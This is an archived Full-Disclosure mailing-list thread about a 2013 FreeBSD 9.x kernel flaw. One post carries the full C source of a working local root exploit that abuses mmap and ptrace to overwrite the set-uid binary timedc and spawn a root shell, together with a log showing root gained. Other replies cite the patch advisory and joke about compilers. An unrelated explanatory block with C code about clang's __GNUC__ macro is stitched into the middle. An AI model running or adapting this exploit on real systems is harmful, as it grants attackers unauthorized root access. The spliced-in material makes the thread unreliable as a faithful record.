Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)

2013-06-24 Thread Kim Henriksen
Poul-Henning Kamp actually walks by my house once in a while, you guys
want me to ask him anything :P?


On Wed, Jun 19, 2013 at 11:32 PM, Hunger hun...@hunger.hu wrote:

 $ uname -a
 FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
 4 09:23:10 UTC 2012
 r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
 $ id
 uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
 $ gcc fbsd9lul.c -o fbsd9lul
 $ ./fbsd9lul
 FreeBSD 9.{0,1} mmap/ptrace exploit
 by Hunger fbsd9...@hunger.hu
 # id
 uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
 #

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




-- 
Mvh.
Kim Henriksen

Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)

2013-06-23 Thread Wojciech Puchar

$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger fbsd9...@hunger.hu
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#


Got fixed. And at the same time - geli got f...d up.



Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)

2013-06-21 Thread Georgi Guninski
On Thu, Jun 20, 2013 at 03:57:20PM -0700, Kurt Buff wrote:
 On Thu, Jun 20, 2013 at 3:41 PM,  valdis.kletni...@vt.edu wrote:
  On Thu, 20 Jun 2013 06:56:16 -0500, Mark Felder said:
 
  But does your exploit compile with clang?
 
  I'm gonna have to call Poe's Law on this one.  I can't tell if you're
  trolling or merely confused. :)
 
 My guess is he's troll-baiting.
 
 Incorporation of clang in FreeBSD as the default compiler (vs. gnucc)
 has been a matter of some heat+light in the FreeBSD community.
 
 Kurt



I won a moderate amount of beer from bets on "when will FreeBSD ditch
gcc from base?". Fanatics took the bait and got mad at the
observation that FreeBSD wouldn't exist in its current form without gcc.

Since at least recently, clang can't compile some stuff g++ can
(almost sure GNU extensions).



Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)

2013-06-21 Thread Jeffrey Walton
On Fri, Jun 21, 2013 at 7:48 AM, Georgi Guninski gunin...@guninski.com wrote:
 On Thu, Jun 20, 2013 at 03:57:20PM -0700, Kurt Buff wrote:
 ...

 I won a moderate amount of beer from bets on "when will FreeBSD ditch
 gcc from base?". Fanatics took the bait and got mad at the
 observation that FreeBSD wouldn't exist in its current form without gcc.

 Since at least recently, clang can't compile some stuff g++ can
 (almost sure GNU extensions).
Clang has caused a lot of pain and misery because it claims to be GCC,
but it can't digest programs with GCC extensions.

https://www.google.com/#q=clang+__GNUC__+bug

Jeff

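The point Jeff makes above, that clang defines __GNUC__ and so looks like GCC to code that only tests that macro, is easy to get wrong in a portable header. The following is an added example (not code from Jeff's post, from FreeBSD or from clang); the function names are mine. It shows why the __clang__ test has to come before the __GNUC__ test, and how to probe for a specific extension with __has_builtin / __has_attribute (with fallbacks for compilers that lack those probes) instead of inferring support from __GNUC__ alone.

```c
#include <stdio.h>
#include <string.h>

/* Fallbacks so the probes are usable on compilers that do not define them
 * (older GCC): an absent probe reports "not available" rather than failing
 * to preprocess. */
#ifndef __has_builtin
#define __has_builtin(x) 0
#endif
#ifndef __has_attribute
#define __has_attribute(x) 0
#endif

/* Which compiler is really running. Clang defines __GNUC__ as well, so the
 * __clang__ branch must come first or clang is misreported as GCC. */
const char *compiler_name(void)
{
#if defined(__clang__)
	return "clang";
#elif defined(__GNUC__)
	return "gcc";
#else
	return "other";
#endif
}

/* The naive test: "__GNUC__ is defined, therefore this is GCC". It is also
 * true on clang, which is why code gated only on __GNUC__ breaks as soon as
 * clang lacks one of the GCC extensions that code goes on to use. */
int claims_gcc(void)
{
#if defined(__GNUC__)
	return 1;
#else
	return 0;
#endif
}

/* Ask for the builtin instead of assuming it from __GNUC__: the builtin is
 * used only when the compiler reports it (or is GCC proper, which predates
 * the __has_builtin probe); otherwise the plain value is returned. */
long likely_nonzero(long v)
{
#if __has_builtin(__builtin_expect) || (defined(__GNUC__) && !defined(__clang__))
	return __builtin_expect(v, 1);
#else
	return v;
#endif
}

/* Same pattern for attributes: probe, do not infer. */
int has_noinline_attribute(void)
{
#if __has_attribute(noinline)
	return 1;
#else
	return 0;
#endif
}

int main(void)
{
	printf("compiler: %s, defines __GNUC__: %d\n", compiler_name(), claims_gcc());
	printf("noinline attribute supported: %d\n", has_noinline_attribute());
	printf("likely_nonzero(5) = %ld\n", likely_nonzero(5));
	return 0;
}
```

Build it once with gcc and once with clang: both report "defines __GNUC__: 1", but compiler_name() differs, which is exactly the distinction a header that tests only __GNUC__ loses.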


Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)

2013-06-21 Thread Hunger
:))

and with pcc too :)

On Thu, Jun 20, 2013 at 1:56 PM, Mark Felder f...@feld.me wrote:
 On Wed, 19 Jun 2013 16:32:59 -0500, Hunger hun...@hunger.hu wrote:

 $ uname -a
 FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
 4 09:23:10 UTC 2012
 r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
 $ id
 uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
 $ gcc fbsd9lul.c -o fbsd9lul
 $ ./fbsd9lul
 FreeBSD 9.{0,1} mmap/ptrace exploit
 by Hunger fbsd9...@hunger.hu
 # id
 uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
 #


 But does your exploit compile with clang?



Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)

2013-06-20 Thread Mark Felder

On Wed, 19 Jun 2013 16:32:59 -0500, Hunger hun...@hunger.hu wrote:


$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger fbsd9...@hunger.hu
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#


But does your exploit compile with clang?



Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)

2013-06-20 Thread Valdis . Kletnieks
On Thu, 20 Jun 2013 06:56:16 -0500, Mark Felder said:

 But does your exploit compile with clang?

I'm gonna have to call Poe's Law on this one.  I can't tell if you're
trolling or merely confused. :)



Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)

2013-06-20 Thread Kurt Buff
On Thu, Jun 20, 2013 at 3:41 PM,  valdis.kletni...@vt.edu wrote:
 On Thu, 20 Jun 2013 06:56:16 -0500, Mark Felder said:

 But does your exploit compile with clang?

 I'm gonna have to call Poe's Law on this one.  I can't tell if you're
 trolling or merely confused. :)

My guess is he's troll-baiting.

Incorporation of clang in FreeBSD as the default compiler (vs. gnucc)
has been a matter of some heat+light in the FreeBSD community.

Kurt



Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)

2013-06-19 Thread Samuel Ports
Believe patch already released

On Wednesday, June 19, 2013, Hunger wrote:

 $ uname -a
 FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
 4 09:23:10 UTC 2012
 r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
 $ id
 uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
 $ gcc fbsd9lul.c -o fbsd9lul
 $ ./fbsd9lul
 FreeBSD 9.{0,1} mmap/ptrace exploit
 by Hunger fbsd9...@hunger.hu
 # id
 uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
 #


[Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)

2013-06-19 Thread Hunger
$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger fbsd9...@hunger.hu
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#
/*
 * FreeBSD 9.{0,1} mmap/ptrace exploit
 * by Hunger fbsd9...@hunger.hu
 *
 * Happy Birthday FreeBSD!
 * Now you are 20 years old and your security is the same as 20 years ago... :)
 *
 * Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof,
 *  sd, sghctoma, snq, spender, s2crew and others at #hekkcamp:
 *  I hope we'll meet again at 8@1470n ;)
 *
 * Special thanks to proactivesec.com
 *
 */

#include <err.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>

#define SH "/bin/sh"
#define TG "/usr/sbin/timedc"

int
main(int ac, char **av) {
    int from_fd, to_fd, status;
    struct stat st;
    struct ptrace_io_desc piod;
    char *s, *d;
    pid_t pid;

    /* Second stage: when re-run with effective uid 0, hand over to a shell. */
    if (geteuid() == 0) {
        setuid(0);
        execl(SH, SH, NULL);
        return 0;
    }

    printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");
    printf("by Hunger fbsd9...@hunger.hu\n");

    /* Open this binary and the set-uid target, both read-only. */
    if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
        (to_fd = open(TG, O_RDONLY)) == -1)
        err(1, "open");

    if (stat(av[0], &st) == -1)
        err(2, "stat");

    /* Map both files read-only and shared. */
    if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
                   MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
        ((d = mmap(NULL, (size_t)st.st_size, PROT_READ,
                   MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED))
        err(3, "mmap");

    if ((pid = fork()) == -1)
        err(4, "fork");

    if (!pid) {
        /* Child: request tracing, then exit. */
        if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
            err(5, "ptraceme");

        return 0;
    }

    /* Parent: attach to the child and wait for it to stop. */
    if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
        err(6, "ptattach");

    if (wait(&status) == -1)
        err(7, "wait");

    /* PT_IO request copying the first mapping over the second through the
     * traced child; this is the kernel bug fixed by FreeBSD-SA-13:06.mmap. */
    piod.piod_op = PIOD_WRITE_D;
    piod.piod_offs = d;
    piod.piod_addr = s;
    piod.piod_len  = st.st_size;

    if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
        err(8, "ptio");

    execl(TG, TG, NULL);

    return 0;
}

Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)

2013-06-19 Thread Steven Hartland

You mean patched:-
http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc

- Original Message - 
From: Hunger hun...@hunger.hu




$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger fbsd9...@hunger.hu
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#








___
freebsd-hack...@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-hackers
To unsubscribe, send any mail to freebsd-hackers-unsubscr...@freebsd.org

